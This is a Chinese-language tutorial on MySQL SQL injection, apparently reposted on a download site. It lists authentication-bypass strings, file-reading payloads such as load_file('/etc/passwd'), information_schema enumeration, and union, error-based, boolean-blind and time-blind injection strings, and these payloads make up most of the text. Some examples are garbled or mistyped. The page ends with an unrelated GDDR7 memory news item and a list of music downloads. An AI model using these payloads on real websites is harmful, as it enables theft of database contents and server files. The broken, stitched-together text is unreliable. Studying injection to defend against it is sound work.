什么是SQL注入(SQL Injection)
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。
mysql常用注释
#
--[空格]或者是--+
/*…*/
在注意过程中,这些注释可能都需要进行urlencode。
mysql认证绕过
;%00
‘ or 1=1 #
‘ /*!or */ 1=1 --+
mysql连接符
mysql中使用+来进行连接。
select * from users where username='zhangsan' and "ab"="a"+"b";
mysql中常见函数
在进行sql注入过程中,会使用到mysql中的内置函数。在内置函数中,又分为获取信息的函数和功能函数。
信息函数是用来获取mysql中的数据库的信息,功能函数就是传统的函数用来完成某项操作。
常用的信息函数有:
database()
,用于获取当前所使用的数据库信息
version():
返回数据库的版本,等价于@@version
user():
返回当前的用户,等价如current_user参数。如:
select user(); #root@localhost select current_user; #root@localhost
@@datadir
,获取数据库的存储位置。
select @@datadir; #D:\xampp\mysql\data\
常见的功能函数有:
load_file():
从计算机中载入文件,读取文件中的数据。
select * from users union select 1,load_file('/etc/passwd'),3; select * from users union select 1,load_file(0x2F6574632F706173737764),3; #使用16进制绕过单引号限制
into outfile:
写入文件,前提是具有写入权限
select '<"htmlcode">select concat(username,password)from users;
*concat_ws()
:是concat_ws()
的特殊形式,第一个参数是分隔符,剩下的参数就是字段名。select concat_ws(',',username,password) from users;
group_concat()
:用于合并多条记录中的结果。用法如下:
select group_concat(username) from users; #返回的就是users表中所有的用户名,并且是作为一条记录返回。
subtring()
,substr():
用于截断字符串。用法为:substr(str,pos,length)
,注意pos是从1开始的。select substr((select database()),1,1);
ascii():
用法返回字符所对应的ascii值。select ascii('a'); #97
length():
返回字符串的长度。如:
select length("123456") #返回6
is(exp1,exp2,exp2):
如果exp1的表达式是True,则返回exp2;否则返回exp3。如:
select 1,2,if(1=1,3,-1) #1,2,3 selecrt 1,2,if(1=2,3,-1) #1,2,-1以上就是在进行sql注入工程中常用的函数。当然还存在一些使用的不是很多的函数。
now():
返回当前的系统时间
hex():
返回字符串的16进制
unhex():
反向的hex()的16进制
@@basedir():
反向mysql的安装目录
@@versin_compile_os:
操作系统
mysql数据库元信息
在mysql中存在
information_schema
是一个信息数据库,在这个数据库中保存了Mysql服务器所保存的所有的其他数据库的信息,如数据库名,数据库的表,表的字段名称
和访问权限。在
informa_schema
中常用的表有:schemata:存储了mysql中所有的数据库信息,返回的内容与show databases的结果是一样的。
tables:存储了数据库中的表的信息。详细地描述了某个表属于哪个schema,表类型,表引擎。
show tables from secuiry的结果就是来自这个表
columns:详细地描述了某张表的所有的列以及每个列的信息。
show columns from users的结果就是来自这个表
下面就是利用以上的3个表来获取数据库的信息。
select database(); #查选数据库 select schema_name from information_schema.schemata limit 0,1 #查询数据库 select table_name from information_schema.tables where table_schema=database() limit 0,1; #查询表 select column_name from information_schema.columns where table_name='users' limit 0,1; #查询列sql注入类型
sql注入类型大致可以分为常规的sql注入和sql盲注。sql盲注又可以分为基于时间的盲注和基于网页内容的盲注。
关于sql的盲注,网上也有很多的说明,这里也不做过多的解释。关于盲注的概念,有具体的例子就方便进行说明。
延时注入中,常用的函数就包括了if()
和sleep()
函数。基本的sql表达式如下:
select * from users where id=1 and if(length(user())=14,sleep(3),1); select * from users where id=1 and if(mid(user(),1,1)='r',sleep(3),1);宽字节注入
关于宽字节注入,可以参考宽字节注入详解。宽字节输入一般是由于网页编码与数据库的编码不匹配造成的。对于宽字节注入,使用%d5或%df绕过
mysql常用语句总结
常规注入
1' order by num # 确定字段长度 1' union select 1,2,3 # 确定字段长度 -1' union select 1,2,3 # 判断页面中显示的字段 -1' union select 1,2,group_concat(schema_name) from information_schema.schemata #显示mysql中所有的数据库 -1' union select 1,2 group_concat(table_name) from information_schema.tables where table_schame = "dbname"/database()/hex(dbname) # -1' union select 1,2,column_name from information_schema.columns where table_name="table_name" limit 0,1 # -1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="table_name"/hex(table_name) limit 0,1 # -1' union select 1,2,3 AND '1'='1 在注释符无法使用的情况下双重SQL查选
select concat(0x3a,0x3a,(select database()),0x3a,0x3a); select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a; select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables; select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a; #这种sql语句的写法,常用于sql的盲注。得到数据库的信息 select count(*),concat(0x3a,0x3a,(select table_name from information_schema.table where table_schema=database() limi 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a; #得到数据库的表的信息 #利用姿势如下: 1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.table where table_schema=database() limi 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+这种利用姿势是通过mysql执行sql命令时的报错信息来得到所需要的信息的,在接下来的文章中会对这种写法进行详细地分析。
bool盲注
1' and ascii(substr(select database(),1,1))>99 1' and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>90bool盲注就是根据sql语句执行返回值是True或False对应的页面内容会发生,来得到信息。
time盲注
1' AND select if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(10),null) + 1' AND select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(10),null) --+上述的2种写法都是等价的,time盲注余常规的sql注入方法不同。time盲注需要一般需要使用到
if()
和sleep()
函数。然后根据页面返回内容的长度,进而知道sleep()
函数是否有执行。
根据
sleep()
函数是否执行来得到所需的信息。总结
以上就是sql注入之必备的基础知识,接下来的文章将会通过实例详细地讲解sql注入中的知识,今天的这篇文章也主要是作为一个基础知识。对sql注入感兴趣的朋友们请继续关注哦。
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
RTX 5090要首发 性能要翻倍!三星展示GDDR7显存
三星在GTC上展示了专为下一代游戏GPU设计的GDDR7内存。
首次推出的GDDR7内存模块密度为16GB,每个模块容量为2GB。其速度预设为32 Gbps(PAM3),但也可以降至28 Gbps,以提高产量和初始阶段的整体性能和成本效益。
据三星表示,GDDR7内存的能效将提高20%,同时工作电压仅为1.1V,低于标准的1.2V。通过采用更新的封装材料和优化的电路设计,使得在高速运行时的发热量降低,GDDR7的热阻比GDDR6降低了70%。
更新日志
- 小骆驼-《草原狼2(蓝光CD)》[原抓WAV+CUE]
- 群星《欢迎来到我身边 电影原声专辑》[320K/MP3][105.02MB]
- 群星《欢迎来到我身边 电影原声专辑》[FLAC/分轨][480.9MB]
- 雷婷《梦里蓝天HQⅡ》 2023头版限量编号低速原抓[WAV+CUE][463M]
- 群星《2024好听新歌42》AI调整音效【WAV分轨】
- 王思雨-《思念陪着鸿雁飞》WAV
- 王思雨《喜马拉雅HQ》头版限量编号[WAV+CUE]
- 李健《无时无刻》[WAV+CUE][590M]
- 陈奕迅《酝酿》[WAV分轨][502M]
- 卓依婷《化蝶》2CD[WAV+CUE][1.1G]
- 群星《吉他王(黑胶CD)》[WAV+CUE]
- 齐秦《穿乐(穿越)》[WAV+CUE]
- 发烧珍品《数位CD音响测试-动向效果(九)》【WAV+CUE】
- 邝美云《邝美云精装歌集》[DSF][1.6G]
- 吕方《爱一回伤一回》[WAV+CUE][454M]